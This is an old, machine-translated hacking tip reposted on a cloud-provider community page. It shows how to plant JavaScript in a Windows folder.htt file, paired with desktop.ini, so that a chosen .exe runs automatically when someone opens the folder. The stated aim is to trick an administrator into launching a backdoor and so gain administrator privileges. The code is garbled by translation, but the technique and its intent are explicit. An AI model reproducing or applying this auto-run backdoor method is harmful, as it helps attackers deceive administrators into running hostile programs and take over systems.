Use DESKTOP. INI and folder. htt to automatically run the program

Source: Internet
Author: User

Source: http://grayhat.512j.com/

Set the desktop in the c: winnt directory. ini and folder. htt (Note: desktop in different directories. ini and folder. htt files are different, so it must be in the winnt directory .) Copy the file and use NotePad to open the folder. htt file and add the following code to the beginning:
<Script language = "javascript">
Run_exe = "<object id =" RUNIT "!
WIDTH = 0 HEIGHT = 0 TYPE = "application/x-oleobject ""
Run_exe + = "CODEBASE =" program name .exe # version =, ">"
Run_exe + = "<param name =" _ Version "value =" 65536 ">"
Run_exe + = "</OBJECT>"
Document. open ();
Document. clear ();
Document. writeln (run_exe );
Document. close ();
</Script>
Change the program name .exe to the name of the program you want to start.
Now we only need to set the desktop. ini, folder. the htt and the program to be started are stored in the same read-only directory (remember to use the read-only directory, and the administrator should always go in). When the Administrator opens this directory, the program runs automatically.

This method can be used to obtain administrator privileges by starting the backdoor program.

 

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.